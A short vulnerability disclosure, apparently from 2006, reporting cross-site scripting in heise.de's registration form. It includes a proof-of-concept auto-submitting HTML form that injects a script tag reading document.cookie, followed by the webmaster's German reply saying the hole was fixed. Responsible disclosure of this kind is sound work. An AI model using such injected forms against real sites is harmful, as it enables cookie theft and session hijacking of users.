heise.de - a German news site for, amongst others, security related topics - is vulnerable for XSS (
Cross Site Scripting). I contacted the webmaster of heise.de about this on December 23 but I did not receive an answer and the XSS vulnerability is still not addressed.
PoC:
<form method="post" action="http://www.heise.de/registration/"
name="heise">
<input type="text" name="uid" size="20" value=''>
<input type="text" name="vorname" size="20"
value='"><script>alert(document.cookie)</script>'>
<input type="text" name="name" size="20"
value='"><script>alert(document.cookie)</script>'>
</form>
<body onload="heise.submit();">
heise-xss-poc.txt
UPDATE: 2006-01-09: 20:26
Hallo Herr Waldegger,
vielen Dank für Ihren Hinweis. Aufgrund der Feiertage hat die Behebung leider etwas länger gedauert.
Mit freundlichen Grüßen
heise online
Webmaster